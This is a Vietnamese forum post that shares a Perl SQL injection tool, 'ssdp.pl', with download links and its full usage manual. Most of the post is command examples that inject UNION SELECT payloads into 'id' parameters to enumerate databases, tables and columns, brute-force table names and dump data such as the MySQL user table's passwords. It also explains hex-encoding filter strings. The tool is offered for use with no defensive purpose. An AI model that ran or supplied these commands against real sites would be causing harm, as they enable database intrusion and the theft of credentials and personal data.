đầu tiên down cái tool này ( viết bằng perl )
http://pacenoge.org/tool/ssdp51.tar.gz
phần mềm hổ trợ :
http://www.perl.org/get.html
Hướng dẫn có kèm trong file ssdp51.tar.gz luôn nhưng post lên đây cho nó dài dài
còn đầy là cái video của not_higgle bên DF làm
http://pacenoge.org/tool/ssdp51.tar.gz
phần mềm hổ trợ :
http://www.perl.org/get.html
Hướng dẫn có kèm trong file ssdp51.tar.gz luôn nhưng post lên đây cho nó dài dài
Quote:
| [INPUT] -u [SQLi URL] target with id parameter or sqli url with c0li string -e [sqli end tag] sql injection end tag (default: \"--\") -d [database name] this option should not be used (default: \@\@database) -t [table name] table_name -c [columns name] column_name (example: id,user,pass,email) -s [space code] SPACE code: +,/**/,%20 (default: \"+\") -f [max field] max field to get magic number (default: 123) -start [num] row number to begin dumping data -stop [num] row number to stop dumping -log [file name] file name to save ssdp data (default: ssdp.log) -p [http proxy] hostname:port [COMMAND] -info Get MySQL Information [MySQL v4+] -dbase Concat Databases [MySQL v5+] -table Concat Tables [MySQL v5+] -column Concat Columns [MySQL v5+] -tabcol Concat Tables with Columns [MySQL v5+] -find Search Columns Name [MySQL v5+] -magic Find Magic Number [MySQL v4+] -dump Dump Data [MySQL v4+] -brute Fuzzing Tables & Columns [MySQL v4+] -------------------------------------------------------------------------- Note: [+] [COMMAND] should be in last position. [+] -d [dbname] no need to used if the tables, columns or data you want to extract is in the current database (@@database). 1. Find Magic Number / Null Column "-magic" Required Options: -u Optional: -s, -f, -e, -log, -p Command: perl ssdp.pl -u [URL] [options] -magic Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=1" -magic 2) perl ssdp.pl -u "http://localhost/index.php?id=null" -s "/**/" -f 100 -e "/*" -p 127.0.0.1:8080 -magic 2. Gathering MySQL Information "-info" Required Options: -u Optional: -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -info Example: perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info 3. Concat Databases Required Options: -u Optional: -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -dbase Example: perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -dbase 4. Concat Tables Required Options: -u Optional: -d, -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -table Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -table 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -table 5. Concat Columns Required Options: -u, -t Optional: -d, -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -column Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -t wp_users -column 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -t wp_users -column 6. Concat Tables with Columns "-tabcol" Required Options: -u Optional: -d, -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -tabcol Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d wordpress -tabcol 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -tabcol 7. Dump Data "-dump" Required Options: -u, -t, -c Optional: -d, -start, -stop, -where, -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -c [colname] -start [num] -stop [num] -dump Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mysql -t user -c password -dump 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mysql -t user -c host,user,password -start 5 -stop 10 -dump 8. Special Dump Query "-where [query] -dump" Required Options: -u, -t, -c Optional: -d, -e, -log, -p Command: perl ssdp.pl -u [SQLi URL] -d [dbname] -t [tblname] -c [colname] -where [query] -dump Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "id=1" -dump 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "user=0x61646D696E" -dump 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -d mydb -t user -c id,user,pass,email -where "email like (0x257961686F6F25)" -dump Information: [+] string value should be converted to hexadecimal ascii or decimal ascii before used (http://okedeh.co.tv) [+] 0x61646D696E = "admin", 0x257961686F6F25 = "%yahoo%", char(99,48,108,105) [+] Example MySQL Query: [-] select id,user,pass,email from mydb.user where user='admin'; [-] select id,user,pass,email from mydb.user where email like '%yahoo%'; 9. Brute Tables & Columns "-brute" Command: perl ssdp.pl -u [SQLi URL] -brute Example: [+] perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -brute 10. Combine [COMMAND] Command: perl ssdp.pl -u [SQLi URL] -[options] Example: 1) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info -dbase -table 2) perl ssdp.pl -u "www.target.com/index.php?id=-1+union+select+1,2,c0li,4,5" -info -dbase -tabcol 11. Still thinking on this one :/ |
Quote:
http://hotfile.com/dl/43823298/c827076/phpver4.rar.html